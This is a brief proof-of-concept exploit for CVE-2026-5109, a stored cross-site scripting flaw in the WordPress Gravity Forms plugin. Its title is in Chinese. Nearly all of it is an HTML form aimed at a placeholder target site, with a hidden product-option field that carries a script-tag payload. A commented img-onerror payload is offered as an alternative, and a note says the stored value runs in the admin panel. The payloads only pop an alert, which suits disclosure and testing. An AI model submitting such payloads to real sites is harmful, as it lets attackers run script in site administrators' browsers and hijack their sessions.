CVE-2026-5109 WordPress Gravity Forms存储型XSS漏洞

<!-- PoC for CVE-2026-5109 Description: Malicious payload injected into Product Option field --> <form method="POST" action="http://target-wordpress-site/submit-form"> <!-- The payload targets the Product Option field. The validation logic accepts this if the sanitized version matches a valid option, but the raw value is stored and later executed in the admin panel. --> <input type="hidden" name="input_product_option" value=""><script>alert('CVE-2026-5109-XSS')</script>"> <input type="submit" value="Submit Entry"> </form> <!-- Alternative Payload (img tag): <input type="hidden" name="input_product_option" value=""><img src=x onerror=alert(1)>"> -->